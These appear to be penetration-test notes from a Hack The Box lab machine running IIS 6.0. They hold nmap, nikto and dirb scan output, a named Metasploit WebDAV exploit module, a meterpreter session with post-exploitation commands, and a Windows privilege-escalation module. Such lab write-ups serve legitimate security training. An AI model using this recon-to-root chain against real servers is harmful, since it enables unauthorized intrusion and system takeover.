PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Error
| http-webdav-scan:
|   Server Date: Wed, 23 Aug 2017 21:11:08 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   WebDAV type: Unkown
|   Server Type: Microsoft-IIS/6.0
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH

Running (JUST GUESSING): Microsoft Windows 2003|XP (91%)
OS CPE: cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_xp::sp2
Aggressive OS guesses: Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows Server 2003 SP1 - SP2 (91%), Microsoft Windows XP SP2 or Windows Server 2003 SP2 (91%), Microsoft Windows 2003 R2 (89%), Microsoft Windows Server 2003 (89%), Microsoft Windows Server 2003 Enterprise Edition (85%), Microsoft Windows Server 2003 R2 SP2 (85%), Microsoft Windows Server 2003 SP1 or R2 (85%)

Hosts
=====

address      mac  name  os_name       os_flavor  os_sp  purpose  info  comments
-------      ---  ----  -------       ---------  -----  -------  ----  --------
10.10.10.14             Windows 2003                    server

Services
========

host         port  proto  name  state  info
----         ----  -----  ----  -----  ----
10.10.10.14  80    tcp    http  open   Microsoft IIS httpd 6.0

<h2>nikto</h2>

nikto -host 10.10.10.14 -o grandpa_nikto.xml -C all

	Retrieved ms-author-via header: MS-FP/4.0,DAV
	+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV
	+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
	+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
	+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
	+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
	+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
	+ WebDAV enabled (MKCOL UNLOCK SEARCH COPY PROPFIND LOCK PROPPATCH listed as allowed)
	+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://10.10.10.14/
	+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
	+ OSVDB-3233: /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed.
	+ OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252.
	+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
	+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
	+ Retrieved x-aspnet-version header: 1.1.4322
	+ /_vti_bin/_vti_adm/admin.exe: FrontPage/Sharepointfile available.
	+ /_vti_bin/_vti_aut/author.exe: FrontPage/Sharepointfile available.
	+ /_vti_bin/_vti_aut/author.dll: FrontPage/Sharepointfile available.


<h2>dirb</h2>

dirb http://10.10.10.14:80 /usr/share/wordlists/dirb/common.txt

	+/vulns/iis.txt

	---- Scanning URL: http://10.10.10.14:80/ ----
	==> DIRECTORY: http://10.10.10.14:80/_vti_bin/

	---- Entering directory: http://10.10.10.14:80/_vti_bin/ ----
	==> DIRECTORY: http://10.10.10.14:80/_vti_bin/_vti_adm/
	==> DIRECTORY: http://10.10.10.14:80/_vti_bin/_vti_aut/

	---- Entering directory: http://10.10.10.14:80/_vti_bin/_vti_adm/ ----
	==> DIRECTORY: http://10.10.10.14:80/_vti_bin/_vti_adm/aspnet_client/
	==> DIRECTORY: http://10.10.10.14:80/_vti_bin/_vti_adm/help/
	==> DIRECTORY: http://10.10.10.14:80/_vti_bin/_vti_adm/images/

	---- Entering directory: http://10.10.10.14:80/_vti_bin/_vti_aut/ ----

	---- Entering directory: http://10.10.10.14:80/_vti_bin/_vti_adm/aspnet_client/ ----
	==> DIRECTORY: http://10.10.10.14:80/_vti_bin/_vti_adm/aspnet_client/system_web/

	---- Entering directory: http://10.10.10.14:80/_vti_bin/_vti_adm/help/ ----

---- Entering directory: http://10.10.10.14:80/_vti_bin/_vti_adm/images/ ----

---- Entering directory: http://10.10.10.14:80/_vti_bin/_vti_adm/aspnet_client/system_web/ ----
                                                                               .shtml

Exploit:
exploit/windows/iis/iis_webdav_scstoragepathfromurl

meterpreter > sysinfo
Computer        : GRANPA
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 2
Meterpreter     : x86/windows

run post/windows/manage/migrate

run post/multi/recon/local_exploit_suggester


priv esc:
	exploit/windows/local/ms14_070_tcpip_ioctl
